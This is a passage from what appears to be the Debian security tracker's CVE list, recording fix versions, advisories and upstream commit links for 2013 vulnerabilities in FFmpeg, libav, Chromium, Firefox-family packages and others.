http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=4f1279154ee9baf2078241bf5619774970d18b25 NOTE: Fix needed for ffmpeg 0.5 CVE-2013-0872 (The swr_init function in libswresample/swresample.c in FFmpeg before 1 ...) - ffmpeg (libswresample not yet present in ffmpeg/0.5) - libav (libswresample not present in libav, linavresamle not affected) CVE-2013-0871 (Race condition in the ptrace functionality in the Linux kernel before ...) {DSA-2632-1} - linux 3.2.39-1 - linux-2.6 CVE-2013-0870 (The 'vp3_decode_frame' function in FFmpeg 1.1.4 moves threads check ou ...) 
- ffmpeg (No threading support in vp3 from ffmpeg 0.5) - libav (Vulnerable code added in ffmpeg post-merge) CVE-2013-0869 (The field_end function in libavcodec/h264.c in FFmpeg before 1.1.2 all ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:0.8.5-1 NOTE: libav fix: http://git.libav.org/?p=libav.git;a=commit;h=706acb558a38eba633056773280155d66c2f4b24 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=695af8eed642ff0104834495652d1ee784a4c14d NOTE: Fix needed in ffmpeg 0.5 CVE-2013-0868 (libavcodec/huffyuvdec.c in FFmpeg before 1.1.2 allows remote attackers ...) {DSA-3003-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10.3-1 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=f67a0d115254461649470452058fa3c28c0df294 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=0dfc01c2bbf4b71bb56201bc4a393321e15d1b31 CVE-2013-0867 (The decode_slice_header function in libavcodec/h264.c in FFmpeg before ...) - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav (Code in libav is different/not affect as per libav h264 maintainer) NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=11c99c78bafa77f679a1a3ba06ad00984b9a4cae CVE-2013-0866 (The aac_decode_init function in libavcodec/aacdec.c in FFmpeg before 1 ...) {DSA-2793-1} - ffmpeg (Code in 0.5 is different/not affected) - libav 6:0.8.7-1 (bug #717009) NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=96f452ac647dae33c53c242ef3266b65a9beafb6 NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=a943a132f36f4df8fe2f749744677b71984abce7 CVE-2013-0865 (The vqa_decode_chunk function in libavcodec/vqavideo.c in FFmpeg befor ...) 
{DSA-2855-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:9.8-1 (bug #717009) NOTE: libav commit: http://git.libav.org/?p=libav.git;a=commit;h=f7d18deb73d1dd1b27b2c7062c9a10d168a6c62a CVE-2013-0864 (The gif_copy_img_rect function in libavcodec/gifdec.c in FFmpeg before ...) - ffmpeg (These changes are specific to current ffmpeg and don't affect ffmpeg 0.5) - libav ((These changes are specific to ffmpeg and don't affect libav) CVE-2013-0863 (Buffer overflow in the rle_decode function in libavcodec/sanm.c in FFm ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-0862 (Multiple integer overflows in the process_frame_obj function in libavc ...) - ffmpeg (Smush codec not present in 0.5 ffmpeg) - libav (Smush codec not present in libav) CVE-2013-0861 (The avcodec_decode_audio4 function in libavcodec/utils.c in FFmpeg bef ...) - ffmpeg (These changes are specific to current ffmpeg and don't affect ffmpeg 0.5) - libav (Affected code not present in libav 0.8.x) NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=d270c3202539e8364c46410e15f7570800e33343 NOTE: Affects the libav version in experimental CVE-2013-0860 (The ff_er_frame_end function in libavcodec/error_resilience.c in FFmpe ...) {DSA-3003-1} - ffmpeg 7:2.4.1-1 [squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing) - libav 6:10.1-1 NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=23318a57358358e7a4dc551e830e4503f0638cfe NOTE: [Vittorio] not present in master and 10, fix pushed to 9 and 0.8 CVE-2013-0859 (The add_doubles_metadata function in libavcodec/tiff.c in FFmpeg befor ...) - ffmpeg (These changes are specific to current ffmpeg and don't affect ffmpeg 0.5) - libav ((These changes are specific to ffmpeg and don't affect libav) CVE-2013-0858 (The atrac3_decode_init function in libavcodec/atrac3.c in FFmpeg befor ...) 
	{DSA-2793-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:9.9-1 (bug #717009)
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=13451f5520ce6b0afde861b2285dda659f8d4fb4
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=50cf5a7fb78846fc39b3ecdaa896a10bcd74da2a
	NOTE: Fixed in 0.8.9
CVE-2013-0857 (The decode_frame_ilbm function in libavcodec/iff.c in FFmpeg before 1. ...)
	{DSA-2793-1}
	- ffmpeg (IFF PBM/ILBM bitmap decoder not present in 0.5 ffmpeg)
	- libav 6:9.9-1 (bug #717009)
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=2fbb37b51bbea891392ad357baf8f3dff00bac05
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=7d65e960c72f36b73ae7fe84f8e427d758e61da9
	NOTE: Fixed in 0.8.9
CVE-2013-0856 (The lpc_prediction function in libavcodec/alac.c in FFmpeg before 1.1 ...)
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:9.10-1
	[wheezy] - libav (Vulnerable code not present)
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=fd4f4923cce6a2cbf4f48640b4ac706e614a1594
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=78aa2ed620178044a227fbbe48f749c0dc86023f
CVE-2013-0855 (Integer overflow in the alac_decode_close function in libavcodec/alac. ...)
	- ffmpeg (0.5 series not affected)
	- libav 6:9.9-1 (bug #717009)
	[wheezy] - libav (0.8 series not affected)
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=3920d1387834e2bc334aff9f518f4beb24e470bd
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=f7c5883126f9440547933eefcf000aa78af4821c
CVE-2013-0854 (The mjpeg_decode_scan_progressive_ac function in libavcodec/mjpegdec.c ...)
	{DSA-2793-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:0.8.8-1 (bug #717009)
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=1f41cffe1e3e79620f587545bdfcbd7e6e68ed29
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=cfbd98abe82cfcb9984a18d08697251b72b110c8
CVE-2013-0853 (The wavpack_decode_frame function in libavcodec/wavpack.c in FFmpeg be ...)
	{DSA-2793-1}
	- ffmpeg (Vulnerability introduced later)
	- libav 6:0.8.8-1 (bug #717009)
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=be818df547c3b0ae4fadb50fd210139a8636706a
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=ed50673066956d6f2201a57c3254569f2ab08d9d
CVE-2013-0852 (The parse_picture_segment function in libavcodec/pgssubdec.c in FFmpeg ...)
	{DSA-3003-1}
	- ffmpeg (PGS subtitle decoder not present)
	- libav 6:10.3-1
	NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=c0d68be555f5858703383040e04fcd6529777061
CVE-2013-0851 (The decode_frame function in libavcodec/eamad.c in FFmpeg before 1.1 a ...)
	{DSA-3003-1}
	- ffmpeg (Electronic Arts Madcow Video decoder not present in ffmpeg 0.5)
	- libav 6:10.3-1
	NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=63ac64864c6e0e84355aa3caa5b92208997a9a8d
	NOTE: https://git.libav.org/?p=libav.git;a=commit;h=f9204ec56a4cf73843d1e5b8563d3584c2c05b47 (v10)
	NOTE: https://git.libav.org/?p=libav.git;a=commit;h=e8ff7972064631afbdf240ec6bfd9dec30cf2ce8 (v9)
	NOTE: https://git.libav.org/?p=libav.git;a=commit;h=187cfd3c13a1deb47661486824a5b8f41e158a7a (v0.8)
CVE-2013-0850 (The decode_slice_header function in libavcodec/h264.c in FFmpeg before ...)
	{DSA-2793-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:0.8.7-1 (bug #717009)
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=d6c184880ee2e09fd68c0ae217173832cee5afc1
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=6e5cdf26281945ddea3aaf5eca4d127791f23ca8
CVE-2013-0849 (The roq_decode_init function in libavcodec/roqvideodec.c in FFmpeg bef ...)
	{DSA-2855-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:9.3-1 (bug #717009)
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=3ae610451170cd5a28b33950006ff0bd23036845
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=488f87be873506abb01d67708a67c10a4dd29283
CVE-2013-0848 (The decode_init function in libavcodec/huffyuv.c in FFmpeg before 1.1 ...)
	{DSA-3003-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:10.4-1
	NOTE: Fix in ffmpeg: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=6abb9a901fca27da14d4fffbb01948288b5da3ba
	NOTE: Fix in libav: http://git.libav.org/?p=libav.git;a=commit;h=a7153444df9040bf6ae103e0bbf6104b66f974cb
CVE-2013-0847 (The ff_id3v2_parse function in libavformat/id3v2.c in FFmpeg before 1. ...)
	- ffmpeg (Affected code not present in ffmpeg 0.5)
	- libav (Code in libav is different, read_ttag)
	NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=10416a4d56fa8a89784e4fb62099c3cab17a9952
CVE-2013-0846 (Array index error in the qdm2_decode_super_block function in libavcode ...)
	{DSA-2855-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:9.3-1 (bug #717009)
	NOTE: ffmpeg commit: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=a7ee6281f7ef1c29284e3a4cadfe0f227ffde1ed
	NOTE: libav commit: http://git.libav.org/?p=libav.git;a=commit;h=39bec05ed42e505d17877b0c23f16322f9b5883b
	NOTE: Needed for ffmpeg 0.5
CVE-2013-0845 (libavcodec/alsdec.c in FFmpeg before 1.0.4 allows remote attackers to ...)
	{DSA-2855-1}
	- ffmpeg (MPEG-4 ALS decoder not present in ffmpeg/0.5)
	- libav 6:9.11-1
	NOTE: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=0ceca269b66ec12a23bf0907bd2c220513cdbf16
	NOTE: Fixed in revisions: v9-2748-g2a0fb72, v9.10-7-g3f7d890
	NOTE: http://git.libav.org/?p=libav.git;a=commitdiff;h=2a0fb72
	NOTE: http://git.libav.org/?p=libav.git;a=commitdiff;h=3f7d890
CVE-2013-0844 (Off-by-one error in the adpcm_decode_frame function in libavcodec/adpc ...)
	{DSA-2793-1}
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:9.10-1
	NOTE: ffmpeg commit: http://git.videolan.org/?p=ffmpeg.git;a=commitdiff;h=f18c873ab5ee3c78d00fdcc2582b39c133faecb4
	NOTE: libav commit: https://git.libav.org/?p=libav.git;a=commitdiff;h=12576afe206d35231ccd61f9033c5fdab6a11e
	NOTE: Fixed in 0.8.9
CVE-2013-0843 (content/renderer/media/webrtc_audio_renderer.cc in Google Chrome befor ...)
	- chromium-browser (MacOS-specific)
	[squeeze] - chromium-browser
CVE-2013-0842 (Google Chrome before 24.0.1312.56 does not properly handle %00 charact ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0841 (Array index error in the content-blocking functionality in Google Chro ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0840 (Google Chrome before 24.0.1312.56 does not validate URLs during the op ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0839 (Use-after-free vulnerability in Google Chrome before 24.0.1312.56 allo ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0838 (Google Chrome before 24.0.1312.52 on Linux uses weak permissions for s ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0837 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a d ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0836 (Google V8 before 3.14.5.3, as used in Google Chrome before 24.0.1312.5 ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
	- libv8 (bug #702261; vulnerability was fixed by reverting to old implementation as found in version 3.8.9.20)
CVE-2013-0835 (Unspecified vulnerability in the Geolocation implementation in Google ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0834 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a d ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0833 (Google Chrome before 24.0.1312.52 allows remote attackers to cause a d ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0832 (Use-after-free vulnerability in Google Chrome before 24.0.1312.52 allo ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0831 (Directory traversal vulnerability in Google Chrome before 24.0.1312.52 ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0830 (The IPC layer in Google Chrome before 24.0.1312.52 on Windows omits a ...)
	- chromium-browser (Only affects Windows)
	[squeeze] - chromium-browser
CVE-2013-0829 (Google Chrome before 24.0.1312.52 does not properly maintain database ...)
	- chromium-browser 24.0.1312.68-1
	[squeeze] - chromium-browser
CVE-2013-0828 (The PDF functionality in Google Chrome before 24.0.1312.52 does not pr ...)
	- chromium-browser (PDF functionality not available in Chromium)
	[squeeze] - chromium-browser
CVE-2013-0827 RESERVED
CVE-2013-0826 RESERVED
CVE-2013-0825 RESERVED
CVE-2013-0824 RESERVED
CVE-2013-0823 RESERVED
CVE-2013-0822 RESERVED
CVE-2013-0821 RESERVED
CVE-2013-0820 RESERVED
CVE-2013-0819 RESERVED
CVE-2013-0818 RESERVED
CVE-2013-0817 RESERVED
CVE-2013-0816 RESERVED
CVE-2013-0815 RESERVED
CVE-2013-0814 RESERVED
CVE-2013-0813 RESERVED
CVE-2013-0812 RESERVED
CVE-2013-0811 (Use-after-free vulnerability in Microsoft Internet Explorer 8 and 9 al ...)
	NOT-FOR-US: Microsoft Internet Explorer
CVE-2013-0810 (Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vis ...)
	NOT-FOR-US: Microsoft
CVE-2013-0809 (Unspecified vulnerability in the 2D component in the Java Runtime Envi ...)
	- openjdk-6 6b27-1.12.4-1
	- openjdk-7 7u3-2.1.7-1
CVE-2013-0808 RESERVED
CVE-2013-0807 (Cross-site scripting (XSS) vulnerability in the NewSectionPrompt funct ...)
	NOT-FOR-US: gpEasy CMS
CVE-2013-0806 RESERVED
CVE-2013-0805 (Multiple cross-site scripting (XSS) vulnerabilities in the search feat ...)
	NOT-FOR-US: IT Operations Portal
CVE-2013-0804 (The client in Novell GroupWise 8.0 before 8.0.3 HP2 and 2012 before SP ...)
	NOT-FOR-US: GroupWise
CVE-2013-0803 (A PHP File Upload Vulnerability exists in PolarBear CMS 2.5 via upload ...)
	NOT-FOR-US: PolarBear CMS
CVE-2013-0802 REJECTED
CVE-2013-0801 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2720-1 DSA-2699-1}
	- iceweasel 17.0.6esr-1
	[squeeze] - iceweasel
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0800 (Integer signedness error in the pixman_fill_sse2 function in pixman-ss ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
	- wine-gecko-1.4 (unimportant)
	NOTE: The description is misleading: Firefox embeds a copy of Cairo, the interdiff
	NOTE: shows the respective change at mozilla-esr17/gfx/cairo/cairo/src/cairo-image-surface.c
	NOTE: Apparently the forked copy has changed, the code isn't present in vanilla Cairo
CVE-2013-0799 (Buffer overflow in the Mozilla Maintenance Service in Mozilla Firefox ...)
	- iceweasel (Only affects Firefox on Windows)
CVE-2013-0798 (Mozilla Firefox before 20.0 on Android uses world-writable and world-r ...)
	- iceweasel (Only affects Firefox on Android)
CVE-2013-0797 (Untrusted search path vulnerability in the Mozilla Updater in Mozilla ...)
	- iceweasel (Only affects Firefox on Windows)
CVE-2013-0796 (The WebGL subsystem in Mozilla Firefox before 20.0, Firefox ESR 17.x b ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0795 (The System Only Wrapper (SOW) implementation in Mozilla Firefox before ...)
	{DSA-2720-1 DSA-2699-1}
	- icedove 17.0.7-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	- iceweasel 17.0.5esr-1
	[squeeze] - iceweasel
	[wheezy] - iceape
CVE-2013-0794 (Mozilla Firefox before 20.0 and SeaMonkey before 2.17 do not prevent o ...)
	- iceweasel 17.0.5esr-1 (low)
	[squeeze] - iceweasel
	- iceape (low)
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0793 (Mozilla Firefox before 20.0, Firefox ESR 17.x before 17.0.5, Thunderbi ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0792 (Mozilla Firefox before 20.0 and SeaMonkey before 2.17, when gfx.color_ ...)
	- iceweasel 17.0.5esr-1 (low)
	[squeeze] - iceweasel
	- iceape (low)
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0791 (The CERT_DecodeCertPackage function in Mozilla Network Security Servic ...)
	- nss 2:3.14.3-1 (unimportant)
	NOTE: client crash only
CVE-2013-0790 (Unspecified vulnerability in the browser engine in Mozilla Firefox bef ...)
	- iceweasel (Only affects Firefox on Android)
CVE-2013-0789 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel (Only affects Firefox 19)
	- icedove (Only affects Firefox 19)
	- iceape (Only affects Firefox 19)
CVE-2013-0788 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1
	[squeeze] - iceweasel
	- iceape
	[squeeze] - iceape
	- icedove 17.0.5-1
	[squeeze] - icedove
	[wheezy] - iceape
CVE-2013-0787 (Use-after-free vulnerability in the nsEditor::IsPreformatted function ...)
	{DSA-2699-1}
	[squeeze] - iceweasel
	- iceweasel 17.0.5esr-1
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0786 (The Bugzilla::Search::build_subselect function in Bugzilla 2.x and 3.x ...)
	- bugzilla (low)
	[squeeze] - bugzilla (Minor issue)
	- bugzilla4 (bug #669643)
CVE-2013-0785 (Cross-site scripting (XSS) vulnerability in show_bug.cgi in Bugzilla b ...)
	- bugzilla (low)
	[squeeze] - bugzilla (Minor issue)
	- bugzilla4 (bug #669643)
CVE-2013-0784 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0783 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1 (bug #703071)
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0782 (Heap-based buffer overflow in the nsSaveAsCharset::DoCharsetConversion ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1 (bug #703071)
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0781 (Use-after-free vulnerability in the nsPrintEngine::CommonPrint functio ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0780 (Use-after-free vulnerability in the nsOverflowContinuationTracker::Fin ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1 (bug #703071)
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0779 (The nsCodingStateMachine::NextState function in Mozilla Firefox before ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0778 (The ClusterIterator::NextCluster function in Mozilla Firefox before 19 ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0777 (Use-after-free vulnerability in the nsDisplayBoxShadowOuter::Paint fun ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0776 (Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbi ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1 (bug #703071)
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0775 (Use-after-free vulnerability in the nsImageLoadingContent::OnStopConta ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1 (bug #703071)
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0774 (Mozilla Firefox before 19.0, Firefox ESR 17.x before 17.0.3, Thunderbi ...)
	- iceape (Introduced in Firefox 15)
	- iceweasel (Introduced in Firefox 15)
	- icedove (Introduced in Firefox 15)
CVE-2013-0773 (The Chrome Object Wrapper (COW) and System Only Wrapper (SOW) implemen ...)
	{DSA-2699-1}
	- iceweasel 17.0.5esr-1 (bug #703071)
	[squeeze] - iceweasel
	- icedove 17.0.5-1
	[squeeze] - icedove
	- iceape
	[squeeze] - iceape
	[wheezy] - iceape
CVE-2013-0772 (The RasterImage::DrawFrameTo function in Mozilla Firefox before 19.0, ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0771 (Heap-based buffer overflow in the gfxTextRun::ShrinkToLigatureBoundari ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0770 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0769 (Multiple unspecified vulnerabilities in the browser engine in Mozilla ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	- icedove 10.0.12-1
	[squeeze] - icedove
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0768 (Stack-based buffer overflow in the Canvas implementation in Mozilla Fi ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0767 (The nsSVGPathElement::GetPathLengthScale function in Mozilla Firefox b ...)
	[squeeze] - iceweasel
	- iceweasel 10.0.12esr-1
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0766 (Use-after-free vulnerability in the ~nsHTMLEditRules implementation in ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0765 (Mozilla Firefox before 19.0, Thunderbird before 17.0.3, and SeaMonkey ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0764 (The nsSOCKSSocketInfo::ConnectToProxy function in Mozilla Firefox befo ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0763 (Use-after-free vulnerability in Mozilla Firefox before 18.0, Firefox E ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0762 (Use-after-free vulnerability in the imgRequest::OnStopFrame function i ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0761 (Use-after-free vulnerability in the mozilla::TrackUnionStream::EndTrac ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0760 (Buffer overflow in the CharDistributionAnalysis::HandleOneChar functio ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0759 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0758 (Mozilla Firefox before 18.0, Firefox ESR 10.x before 10.0.12 and 17.x ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0757 (The Chrome Object Wrapper (COW) implementation in Mozilla Firefox befo ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0756 (Use-after-free vulnerability in the obj_toSource function in Mozilla F ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0755 (Use-after-free vulnerability in the mozVibrate implementation in the V ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0754 (Use-after-free vulnerability in the ListenerManager implementation in ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	[squeeze] - icedove
	- icedove 10.0.12-1
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0753 (Use-after-free vulnerability in the serializeToStream implementation i ...)
	- iceweasel 10.0.12esr-1
	[squeeze] - iceweasel
	- icedove 10.0.12-1
	[squeeze] - icedove
	- iceape 2.7.12-1
	[squeeze] - iceape
CVE-2013-0752 (Mozilla Firefox before 18.0, Firefox ESR 17.x before 17.0.2, Thunderbi ...)
	- iceape (Doesn't affect the ESR series, only releases from experimental)
	- iceweasel (Doesn't affect the ESR series, only releases from experimental)
	- icedove (Doesn't affect the ESR series, only releases from experimental)
CVE-2013-0751 (Mozilla Firefox before 18.0 on Android and SeaMonkey before 2.15 do no ...)
	- iceape (Android-specific)
	- iceweasel (Android-specific)
	- icedove (Android-specific)
CVE-2013-0750 (Integer overflow in the JavaScript implementation in Mozilla Firefox b ...)
	- iceweasel 10.0.12esr-1
